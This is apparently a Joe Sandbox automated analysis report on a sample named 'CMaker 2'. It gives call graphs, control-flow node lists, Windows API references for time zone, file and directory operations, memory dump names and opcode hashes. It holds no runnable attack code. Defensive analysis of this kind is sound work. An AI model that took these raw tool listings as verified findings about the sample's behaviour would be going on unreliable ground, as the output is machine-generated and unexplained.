7ff6fabf8dfa 17647 7ff6fabf8f48 17624->17647 17625->17627 17627->17230 17632 7ff6fabf9188 17627->17632 17629 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17630 7ff6fabf8e21 17629->17630 17631 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17630->17631 17631->17627 17633 7ff6fabf91ab 17632->17633 17634 7ff6fabf91c2 17632->17634 17633->17230 17634->17633 17635 7ff6fabfeb84 _get_daylight 11 API calls 17634->17635 17636 7ff6fabf9236 17634->17636 17637 7ff6fabff7a0 MultiByteToWideChar _fread_nolock 17634->17637 17639 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17634->17639 17635->17634 17638 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17636->17638 17637->17634 17638->17633 17639->17634 17641 7ff6fabf8de6 17640->17641 17642 7ff6fac02860 17640->17642 17641->17623 17641->17624 17643 7ff6fabfd444 _fread_nolock 12 API calls 17642->17643 17644 7ff6fac02897 memcpy_s 17643->17644 17645 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17644->17645 17646 7ff6fac028b7 FreeEnvironmentStringsW 17645->17646 17646->17641 17648 7ff6fabf8f70 17647->17648 17649 7ff6fabfeb84 _get_daylight 11 API calls 17648->17649 17662 7ff6fabf8fab 17649->17662 17650 7ff6fabf8fb3 17651 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17650->17651 17652 7ff6fabf8e02 17651->17652 17652->17629 17653 7ff6fabf902d 17654 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17653->17654 17654->17652 17655 7ff6fabfeb84 _get_daylight 11 API calls 17655->17662 17656 7ff6fabf901c 17657 7ff6fabf9064 11 API calls 17656->17657 17659 7ff6fabf9024 17657->17659 17658 7ff6fac00374 37 API calls 17658->17662 17660 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17659->17660 17660->17650 17661 7ff6fabf9050 17663 7ff6fabfa4c4 _isindst 17 API calls 17661->17663 17662->17650 17662->17653 17662->17655 17662->17656 17662->17658 17662->17661 17664 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17662->17664 17665 7ff6fabf9062 17663->17665 17664->17662 17667 7ff6fac08c19 __crtLCMapStringW 17666->17667 17668 7ff6fac0714e 17667->17668 17669 7ff6fabfee54 6 API calls 17667->17669 17668->17254 17668->17255 17669->17668 17670 7ff6fabe9f50 17671 7ff6fabe9f7e 17670->17671 17672 7ff6fabe9f65 17670->17672 17672->17671 17674 7ff6fabfd444 12 API calls 17672->17674 17673 7ff6fabe9fde 17674->17673 20836 7ff6fabfab50 20837 7ff6fabfab55 20836->20837 20838 7ff6fabfab6a 20836->20838 20842 7ff6fabfab70 20837->20842 20843 7ff6fabfabb2 20842->20843 20844 7ff6fabfabba 20842->20844 20845 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20843->20845 20846 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20844->20846 20845->20844 20847 7ff6fabfabc7 20846->20847 20848 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20847->20848 20849 7ff6fabfabd4 20848->20849 20850 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20849->20850 20851 7ff6fabfabe1 20850->20851 20852 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20851->20852 20853 7ff6fabfabee 20852->20853 20854 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20853->20854 20855 7ff6fabfabfb 20854->20855 20856 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20855->20856 20857 7ff6fabfac08 20856->20857 20858 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20857->20858 20859 7ff6fabfac15 20858->20859 20860 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20859->20860 20861 7ff6fabfac25 20860->20861 20862 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20861->20862 20863 7ff6fabfac35 20862->20863 20868 7ff6fabfaa1c 20863->20868 20882 7ff6fac001d8 EnterCriticalSection 20868->20882 20888 7ff6fabf9950 20891 7ff6fabf98c8 20888->20891 20898 7ff6fac001d8 EnterCriticalSection 20891->20898 20559 7ff6fac0acdc 20560 7ff6fac0acec 20559->20560 20563 7ff6fabf4f88 LeaveCriticalSection 20560->20563 20990 7ff6fac0126c 21008 7ff6fac001d8 EnterCriticalSection 20990->21008 21009 7ff6fac0ae62 21012 7ff6fabf4f88 LeaveCriticalSection 21009->21012

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00007FF6FAC05B00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 330 7ff6fac05b00-7ff6fac05b3b call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 337 7ff6fac05d65-7ff6fac05db1 call 7ff6fabfa4c4 call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 330->337 338 7ff6fac05b41-7ff6fac05b4c call 7ff6fac05498 330->338 363 7ff6fac05eef-7ff6fac05f5d call 7ff6fabfa4c4 call 7ff6fac01384 337->363 364 7ff6fac05db7-7ff6fac05dc2 call 7ff6fac05498 337->364 338->337 344 7ff6fac05b52-7ff6fac05b5c 338->344 346 7ff6fac05b7e-7ff6fac05b82 344->346 347 7ff6fac05b5e-7ff6fac05b61 344->347 348 7ff6fac05b85-7ff6fac05b8d 346->348 350 7ff6fac05b64-7ff6fac05b6f 347->350 348->348 351 7ff6fac05b8f-7ff6fac05ba2 call 7ff6fabfd444 348->351 353 7ff6fac05b71-7ff6fac05b78 350->353 354 7ff6fac05b7a-7ff6fac05b7c 350->354 360 7ff6fac05ba4-7ff6fac05ba6 call 7ff6fabfa0e4 351->360 361 7ff6fac05bba-7ff6fac05bc6 call 7ff6fabfa0e4 351->361 353->350 353->354 354->346 357 7ff6fac05bab-7ff6fac05bb9 354->357 360->357 371 7ff6fac05bcd-7ff6fac05bd5 361->371 384 7ff6fac05f5f-7ff6fac05f66 363->384 385 7ff6fac05f6b-7ff6fac05f6e 363->385 364->363 373 7ff6fac05dc8-7ff6fac05dd3 call 7ff6fac054c8 364->373 371->371 374 7ff6fac05bd7-7ff6fac05be8 call 7ff6fac00374 371->374 373->363 382 7ff6fac05dd9-7ff6fac05dfc call 7ff6fabfa0e4 GetTimeZoneInformation 373->382 374->337 383 7ff6fac05bee-7ff6fac05c44 call 7ff6fac0a5b0 * 4 call 7ff6fac05a1c 374->383 400 7ff6fac05ec4-7ff6fac05eee call 7ff6fac05480 call 7ff6fac05470 call 7ff6fac05478 382->400 401 7ff6fac05e02-7ff6fac05e23 382->401 442 7ff6fac05c46-7ff6fac05c4a 383->442 390 7ff6fac05ffb-7ff6fac05ffe 384->390 386 7ff6fac05fa5-7ff6fac05fb8 call 7ff6fabfd444 385->386 387 7ff6fac05f70 385->387 404 7ff6fac05fc3-7ff6fac05fde call 7ff6fac01384 386->404 405 7ff6fac05fba 386->405 391 7ff6fac05f73 387->391 390->391 392 7ff6fac06004-7ff6fac0600c call 7ff6fac05b00 390->392 396 7ff6fac05f78-7ff6fac05fa4 call 7ff6fabfa0e4 call 7ff6fabea9b0 391->396 397 7ff6fac05f73 call 7ff6fac05d7c 391->397 392->396 397->396 406 7ff6fac05e25-7ff6fac05e2b 401->406 407 7ff6fac05e2e-7ff6fac05e35 401->407 428 7ff6fac05fe5-7ff6fac05ff7 call 7ff6fabfa0e4 404->428 429 7ff6fac05fe0-7ff6fac05fe3 404->429 411 7ff6fac05fbc-7ff6fac05fc1 call 7ff6fabfa0e4 405->411 406->407 412 7ff6fac05e49 407->412 413 7ff6fac05e37-7ff6fac05e3f 407->413 411->387 424 7ff6fac05e4b-7ff6fac05ebf call 7ff6fac0a5b0 * 4 call 7ff6fac0295c call 7ff6fac06014 * 2 412->424 413->412 420 7ff6fac05e41-7ff6fac05e47 413->420 420->424 424->400 428->390 429->411 444 7ff6fac05c50-7ff6fac05c54 442->444 445 7ff6fac05c4c 442->445 444->442 447 7ff6fac05c56-7ff6fac05c7b call 7ff6fabf6978 444->447 445->444 453 7ff6fac05c7e-7ff6fac05c82 447->453 455 7ff6fac05c84-7ff6fac05c8f 453->455 456 7ff6fac05c91-7ff6fac05c95 453->456 455->456 458 7ff6fac05c97-7ff6fac05c9b 455->458 456->453 461 7ff6fac05c9d-7ff6fac05cc5 call 7ff6fabf6978 458->461 462 7ff6fac05d1c-7ff6fac05d20 458->462 469 7ff6fac05ce3-7ff6fac05ce7 461->469 470 7ff6fac05cc7 461->470 463 7ff6fac05d22-7ff6fac05d24 462->463 464 7ff6fac05d27-7ff6fac05d34 462->464 463->464 466 7ff6fac05d4f-7ff6fac05d5e call 7ff6fac05480 call 7ff6fac05470 464->466 467 7ff6fac05d36-7ff6fac05d4c call 7ff6fac05a1c 464->467 466->337 467->466 469->462 475 7ff6fac05ce9-7ff6fac05d07 call 7ff6fabf6978 469->475 473 7ff6fac05cca-7ff6fac05cd1 470->473 473->469 477 7ff6fac05cd3-7ff6fac05ce1 473->477 482 7ff6fac05d13-7ff6fac05d1a 475->482 477->469 477->473 482->462 483 7ff6fac05d09-7ff6fac05d0d 482->483 483->462 484 7ff6fac05d0f 483->484 484->482
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B45
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4CD
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4F2
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B34
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                  • API String ID: 4070488512-239921721
                                                                                                                                                                                  • Opcode ID: 87b467ba01405d4ab23210905a1548530960517e986d068784f96916153947de
                                                                                                                                                                                  • Instruction ID: 574d03f9573c635930e5239bb9b16b5f15e172ee570f051b444e3a155a97edbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 87b467ba01405d4ab23210905a1548530960517e986d068784f96916153947de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D1E0A6A1824686EB20DF25D4901B967B8FF84B84F84E076EA6DC76D5FF3CE441C740
                                                                                                                                                                                  Function 00007FF6FAC06A4C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 574 7ff6fac06a4c-7ff6fac06abf call 7ff6fac06780 577 7ff6fac06ac1-7ff6fac06aca call 7ff6fabfb0e8 574->577 578 7ff6fac06ad9-7ff6fac06ae3 call 7ff6fabf80d4 574->578 583 7ff6fac06acd-7ff6fac06ad4 call 7ff6fabfb108 577->583 584 7ff6fac06ae5-7ff6fac06afc call 7ff6fabfb0e8 call 7ff6fabfb108 578->584 585 7ff6fac06afe-7ff6fac06b67 CreateFileW 578->585 601 7ff6fac06e1a-7ff6fac06e3a 583->601 584->583 586 7ff6fac06be4-7ff6fac06bef GetFileType 585->586 587 7ff6fac06b69-7ff6fac06b6f 585->587 593 7ff6fac06c42-7ff6fac06c49 586->593 594 7ff6fac06bf1-7ff6fac06c2c GetLastError call 7ff6fabfb07c CloseHandle 586->594 590 7ff6fac06bb1-7ff6fac06bdf GetLastError call 7ff6fabfb07c 587->590 591 7ff6fac06b71-7ff6fac06b75 587->591 590->583 591->590 599 7ff6fac06b77-7ff6fac06baf CreateFileW 591->599 597 7ff6fac06c51-7ff6fac06c54 593->597 598 7ff6fac06c4b-7ff6fac06c4f 593->598 594->583 609 7ff6fac06c32-7ff6fac06c3d call 7ff6fabfb108 594->609 604 7ff6fac06c5a-7ff6fac06caf call 7ff6fabf7fec 597->604 605 7ff6fac06c56 597->605 598->604 599->586 599->590 612 7ff6fac06cb1-7ff6fac06cbd call 7ff6fac06988 604->612 613 7ff6fac06cce-7ff6fac06cff call 7ff6fac06500 604->613 605->604 609->583 612->613 621 7ff6fac06cbf 612->621 619 7ff6fac06d05-7ff6fac06d47 613->619 620 7ff6fac06d01-7ff6fac06d03 613->620 623 7ff6fac06d69-7ff6fac06d74 619->623 624 7ff6fac06d49-7ff6fac06d4d 619->624 622 7ff6fac06cc1-7ff6fac06cc9 call 7ff6fabfa648 620->622 621->622 622->601 626 7ff6fac06d7a-7ff6fac06d7e 623->626 627 7ff6fac06e18 623->627 624->623 625 7ff6fac06d4f-7ff6fac06d64 624->625 625->623 626->627 629 7ff6fac06d84-7ff6fac06dc9 CloseHandle CreateFileW 626->629 627->601 631 7ff6fac06dfe-7ff6fac06e13 629->631 632 7ff6fac06dcb-7ff6fac06df9 GetLastError call 7ff6fabfb07c call 7ff6fabf8214 629->632 631->627 632->631
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                  • Opcode ID: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
                                                                                                                                                                                  • Instruction ID: 0f5ea9560eb0f925106174c7a36dd0a7adb4d7ab6b2d4c5e30e5c30f37ae0354
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C1C276B28A4185EB10CFA8C4906AC3771EB49BA8B059279DE6ED77D4EF38D055C300
                                                                                                                                                                                  Function 00007FF6FABE6B80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                  • Opcode ID: 7e4a40b963a684cd287bf4d382916e0c44b20c37e6793a520649104d512158ac
                                                                                                                                                                                  • Instruction ID: e2c0f25f5076c5409287d8e48269d475fa46c619c7e9588e876b3a64e4750f28
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4a40b963a684cd287bf4d382916e0c44b20c37e6793a520649104d512158ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40413E61A0CA4281EB609B24E4A42B97360FB95754F8046B2E9BEC37D4FF3CE54AC700
                                                                                                                                                                                  Function 00007FF6FAC05D7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 863 7ff6fac05d7c-7ff6fac05db1 call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 870 7ff6fac05eef-7ff6fac05f5d call 7ff6fabfa4c4 call 7ff6fac01384 863->870 871 7ff6fac05db7-7ff6fac05dc2 call 7ff6fac05498 863->871 883 7ff6fac05f5f-7ff6fac05f66 870->883 884 7ff6fac05f6b-7ff6fac05f6e 870->884 871->870 876 7ff6fac05dc8-7ff6fac05dd3 call 7ff6fac054c8 871->876 876->870 882 7ff6fac05dd9-7ff6fac05dfc call 7ff6fabfa0e4 GetTimeZoneInformation 876->882 897 7ff6fac05ec4-7ff6fac05eee call 7ff6fac05480 call 7ff6fac05470 call 7ff6fac05478 882->897 898 7ff6fac05e02-7ff6fac05e23 882->898 888 7ff6fac05ffb-7ff6fac05ffe 883->888 885 7ff6fac05fa5-7ff6fac05fb8 call 7ff6fabfd444 884->885 886 7ff6fac05f70 884->886 900 7ff6fac05fc3-7ff6fac05fde call 7ff6fac01384 885->900 901 7ff6fac05fba 885->901 889 7ff6fac05f73 886->889 888->889 890 7ff6fac06004-7ff6fac0600c call 7ff6fac05b00 888->890 893 7ff6fac05f78-7ff6fac05fa4 call 7ff6fabfa0e4 call 7ff6fabea9b0 889->893 894 7ff6fac05f73 call 7ff6fac05d7c 889->894 890->893 894->893 902 7ff6fac05e25-7ff6fac05e2b 898->902 903 7ff6fac05e2e-7ff6fac05e35 898->903 921 7ff6fac05fe5-7ff6fac05ff7 call 7ff6fabfa0e4 900->921 922 7ff6fac05fe0-7ff6fac05fe3 900->922 906 7ff6fac05fbc-7ff6fac05fc1 call 7ff6fabfa0e4 901->906 902->903 907 7ff6fac05e49 903->907 908 7ff6fac05e37-7ff6fac05e3f 903->908 906->886 917 7ff6fac05e4b-7ff6fac05ebf call 7ff6fac0a5b0 * 4 call 7ff6fac0295c call 7ff6fac06014 * 2 907->917 908->907 914 7ff6fac05e41-7ff6fac05e47 908->914 914->917 917->897 921->888 922->906
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054DC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                                                                  • Opcode ID: 42261dce043aad9768269ac913bc210d84eadb49ae327d87659dcf3f3c6d79c5
                                                                                                                                                                                  • Instruction ID: b50354e1d2224f425f0befe569970a78b107d42bc8254237206967faf44b811a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 42261dce043aad9768269ac913bc210d84eadb49ae327d87659dcf3f3c6d79c5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B517FB2A1864686E720DF25D8811BA67B8BB48784F44E175EA6DC76D6FF3CE4008B40
                                                                                                                                                                                  Function 00007FF6FABE76F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                  • Opcode ID: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
                                                                                                                                                                                  • Instruction ID: 2e768a783a0a7ae22f38a0293df91a469b127e27269dcdeeee21dc2aad621e15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0C262B1864287F7A08B60F48936673A0FB84728F404775DA7E826D4EF3CD0498A00
                                                                                                                                                                                  Function 00007FF6FAC006D4 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
